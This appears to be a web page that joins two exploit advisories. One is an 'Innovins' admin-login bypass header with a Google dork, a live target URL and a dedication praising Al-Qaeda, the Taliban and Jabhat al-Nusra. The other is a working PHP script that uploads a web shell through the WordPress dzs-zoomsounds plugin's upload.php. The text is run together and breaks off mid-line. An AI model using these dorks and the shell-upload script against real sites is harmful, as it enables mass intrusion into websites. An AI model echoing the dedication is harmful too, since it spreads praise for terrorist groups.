#########################################################
# Exploit Title: [ Innovins Admin Bypass Login ]
########################################################
# Google Dork: [intext:Developed by - Innovins]
# Date: [04/10/2015]
# Exploit Author: [Mujahidin Cyber Army]
# Vendor Homepage: [-]
# Software Link: [-]
# Version: [app version] (REQUIRED)
# Tested on: [Win 8.1/Kali]
# CVE : [-]
########################################################
# Demo: http://deekshaplayschool.com/admin/
##########################################################
# Thanks to : Allah | Rosulullah | Tandhim Al-Qaeda | Thaliban | Jabhah Nushroh
# | United Islamic Cyber Force | Muslim Corporation Cyber | We Are Mujahidin Cyber Army
# Mujahidin Cyber Army : | Izza009 | xGame1945 | MrBz Elfatir | El-Muhajimi |[!] Jihad797 [!] | 1D10T
############################################################ ############################## ##############
################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS, array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...

Comments
Post a Comment